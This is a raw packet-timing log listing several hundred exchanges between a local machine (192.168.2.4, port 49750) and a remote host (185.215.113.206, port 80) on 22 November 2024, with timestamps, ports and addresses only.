Nov 22, 2024 20:35:29.094440937 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.095215082 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.095253944 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.095268965 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.095305920 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.096129894 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.096231937 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.096271992 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.096271992 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.097095013 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.097142935 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.097234011 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.097275019 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.098195076 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.098258972 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.098279953 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.098321915 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.099298000 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.099368095 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.099380970 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.099406958 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.100087881 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.100143909 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.100166082 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.100209951 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.100857019 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.100913048 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.100951910 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.101006031 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.101686001 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.101736069 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.101818085 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.101866007 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.102632046 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.102689981 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.102720022 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.102762938 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.103559971 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.103612900 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.103648901 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.103697062 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.104490995 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.104543924 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.104558945 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.104588032 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.105386019 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.105433941 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.105470896 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.105516911 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.106251001 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.106300116 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.106420040 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.106467009 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.107175112 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.107223034 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.107278109 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.107328892 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.108103991 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.108150959 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.108217001 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.108262062 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.109045029 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.109093904 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.109133005 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.109174013 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.110045910 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.110096931 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.110187054 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.110239029 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.110894918 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.110943079 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.111046076 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.111092091 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.111794949 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.111850977 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.111879110 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.111918926 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.112694979 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.112746000 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.112793922 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.112839937 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.113666058 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.113715887 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.113760948 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.113801003 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.114547014 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.114593983 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.114614010 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.114659071 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.212152004 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.212223053 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.212241888 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.212281942 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.212594986 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.212641954 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.212680101 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.212721109 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.213376045 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.213423014 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.213454962 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.213496923 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.214057922 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.214103937 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.214139938 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.214188099 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.214968920 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.215015888 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.215018034 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.215055943 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.215863943 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.215913057 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.215919971 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.215950012 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.216809988 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.216856003 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.216906071 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.216948032 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.217833042 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.217881918 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.217947960 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.217987061 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.218849897 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.218894005 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.218894958 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.218935966 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.219896078 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.219929934 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.219954014 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.219984055 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.220510006 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.220560074 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.220628023 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.220676899 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.221426964 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.221470118 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.221514940 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.221553087 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.222340107 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.222383976 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.222423077 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.222484112 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.223249912 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.223293066 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.223356009 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.223398924 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.224208117 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.224257946 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.224261045 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.224297047 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.225240946 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.225286007 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.225295067 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.225312948 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.226016998 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.226063013 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.226120949 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.226171017 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.226938963 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.226984024 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.227077961 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.227121115 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.227907896 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.227946997 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.227983952 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.228023052 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.228977919 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.228988886 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.229022980 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.229042053 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.229722977 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.229763985 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.229820967 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.229861975 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.230639935 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.230685949 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.230775118 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.230825901 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.231580019 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.231626034 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.231682062 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.231733084 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.232513905 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.232563972 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.232656002 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.232703924 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.233428955 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.233531952 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.233551025 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.233587980 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.234327078 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.234370947 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.234421968 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.234479904 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.235256910 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.235307932 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.235336065 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.235378027 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.283214092 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.283277035 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.283291101 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.283334970 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.283587933 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.283632040 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.283657074 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.283698082 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.284492016 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.284538984 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.284571886 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.284614086 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.285362959 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.285407066 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.285408974 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.285444021 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.286288977 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.286333084 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.286376953 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.286420107 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.287201881 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.287245989 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.287368059 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.287421942 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.288129091 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.288172960 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.288213968 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.288258076 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.289050102 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.289099932 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.289139986 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.289196014 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.289966106 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.290009975 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.290071964 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.290118933 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.290934086 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.290988922 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.291095972 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.291134119 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.291814089 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.291857958 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.291932106 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.291975975 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.292823076 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.292838097 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.292874098 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.292886972 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.293713093 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.293765068 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.293826103 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.294105053 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.294796944 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.294840097 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.294841051 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.294877052 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.295579910 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.295629978 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.295644045 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.295721054 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.296489000 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.296551943 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.296694040 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.296731949 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.297462940 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.297514915 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.297605038 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.297648907 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.298320055 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.298357964 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.298363924 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.298396111 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.299221039 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.299263954 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.299407959 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.299448967 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.300215960 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.300260067 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.300498962 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.300540924 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.301120043 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.301172018 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.301249981 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.301299095 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.301965952 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.302007914 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.302092075 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.302131891 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.302927017 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.302968979 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.303030968 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.303066969 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.303860903 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.303905964 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.304004908 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.304043055 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.304744005 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.304790974 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.304863930 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.304903030 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.305656910 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.305694103 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.305771112 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.305814028 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.306592941 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.306632996 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.306648970 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.306838989 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.306881905 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.335911036 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.335957050 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.335971117 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.336004019 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.336240053 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.336287975 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.336321115 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.336364031 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.337116003 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.337161064 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.337229013 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.337266922 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.338180065 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.338222980 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.338299036 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.338337898 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.338978052 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.339021921 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.339097023 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.339155912 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.339925051 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.339976072 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.340120077 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.340161085 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.340790033 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.340837955 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.340913057 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.340953112 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.341716051 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.341757059 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.341872931 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.341922998 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:29.342648029 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:29.342762947 CET	80	49750	185.215.113.206	192.168.2.4
